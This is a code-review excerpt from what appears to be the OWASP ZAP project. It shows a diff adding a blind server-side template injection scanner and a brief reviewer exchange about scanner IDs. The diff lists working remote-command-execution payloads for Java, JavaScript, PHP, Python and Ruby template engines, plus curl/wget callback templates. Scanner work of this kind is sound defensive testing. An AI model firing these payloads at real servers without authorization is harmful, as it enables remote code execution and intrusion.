addOns/sstiscanner/src/main/java/org/zaproxy/zap/extension/sstiscanner/SSTIBlindScanner.java

```diff
@@ -0,0 +1,338 @@
+
+/**
+ * Active Plugin for Server Side Template Injection testing and verification.
+ *
+ * @author DiogoMRSilva (2019)
+ */
+public class SSTIBlindScanner extends AbstractAppParamPlugin {
+
+    /** Prefix for internationalised messages used by this rule */
+    private static final String MESSAGE_PREFIX = "sstiscanner.sstiblindplugin.";
+
+    private static final float ERROR_MARGIN = 0.9f;
+    private static final int SEC_TO_MILLISEC = 1000;
+
+    // Most of the exploits have been created by James Kettle @albinowax and the Tplmap creator
+    // WARNING all the payloads that uses % need to quadruplicate the char to %%%%
+
+    private static final String[] java_command_exec_payloads = {
+        "<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"%s\") }", // javaFreemarker https://portswigger.net/blog/server-side-template-injection
+        "#set($engine=\"\")\r\n"
+                + "#set($proc=$engine.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\"))\r\n"
+                + "#set($null=$proc.waitFor())\r\n"
+                + "${null}" // javaVelocity
+        // https://portswigger.net/blog/server-side-template-injection
+    };
+
+    private static final String[] javascript_command_exec_payloads = {
+        "{{= global.process.mainModule.require('child_process').execSync('%s').toString() }}", // Javascript dot
+        "<%%%%= global.process.mainModule.require('child_process').execSync('%s').toString()%%%%>", // Javascript EJS
+        "#{global.process.mainModule.require('child_process').execSync('%s').toString()}", // Javascript jade
+        "{{range.constructor(\"return eval(\\\"global.process.mainModule.require('child_process').execSync('%s').toString()\\\")\")()}}" // Javascript Nunjucks
+    };
+
+    private static final String[] php_command_exec_payloads = {
+        "{system(\"%s\")}", // PHP smarty
+    };
+
+    private static final String[] python_command_exec_payloads = {
+        "{{\"\".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get(\"__builtins__\").get(\"__import__\")(\"subprocess\").check_output(\"%s\")}}", // python3 jinja2 possibly doesn't work
+        "${__import__(\"subprocess\").check_output(\"%s\", shell=True)}", // python Mako
+        "{{__import__(\"subprocess\").check_output(\"%s\", shell=True)}}", // Python Tornado
+    };
+
+    private static final String[] ruby_command_exec_payloads = {
+        "<%%%%=%%%%x(%s)%%%%>", // Ruby ERB
+        "#{%%%%x(%s)}" // Ruby Slims
+    };
+
+    private static final String[] ways_to_make_http_requests_cmd_line = {"curl %s", "wget %s"};
+
+    private SSTIChallengeCallbackApi callbackAPI = new SSTIChallengeCallbackApi();
+
+    private static final Logger log = Logger.getLogger(SSTIBlindScanner.class);
+
+    @Override
+    public boolean inScope(Tech tech) {
+        return this.getTechSet().includes(tech);
+    }
+
+    @Override
+    public int getId() {
+        return 90036;
```

Comment:
Would you mind creating a PR adding the IDs to [scanners.md](https://github.com/zaproxy/zaproxy/blob/develop/docs/scanners.md)?

Reply:
No problem. I will do it asap.

Reply:
Thanks.

Reply:
https://github.com/zaproxy/zaproxy/pull/5626